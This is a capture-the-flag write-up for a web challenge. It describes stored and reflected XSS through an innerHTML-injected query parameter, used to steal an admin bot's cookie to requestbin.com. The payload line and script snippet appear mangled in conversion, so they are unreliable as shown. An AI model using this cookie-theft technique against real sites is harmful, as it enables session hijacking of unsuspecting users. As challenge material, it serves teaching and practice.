# Query Service

We can run queries against an SQL server. We have no info on the sql server
though. Queries like `CREATE TABLE mytable (column1 int); INSERT INTO mytable
(column1) VALUES (7); SELECT * FROM mytable;` work without error. The query is
basically just appended as a url parameter in the get request.

Notice that when sending a query, a fetch to sql.db is made which fetches a
.db file. The file reveals infos about a `notes` table. `SELECT * FROM notes`
reveals:  
```  
submit link to admin bot at http://webp.bcactf.com:49155/  
the flag is in the bot's "flag" cookie  
```

The javascript of the page contains the following:  
```typescript  
if (searchParams.get("query")) {  
let query = searchParams.get("query");  
linkdiv.innerHTML = "Link to this query: (link)";  
```

This looks like XSS is possible by sending a malicious "query link" to the
admin.

After tampering with the query parameter for a while and using
https://requestbin.com/, I was able to get the admin cookie with an img tag
and an onerror attribute:  
`CREATE TABLE mytable (column1 int);">![](x)`

Sending the link to the admin reveals the flag on https://requestbin.com/.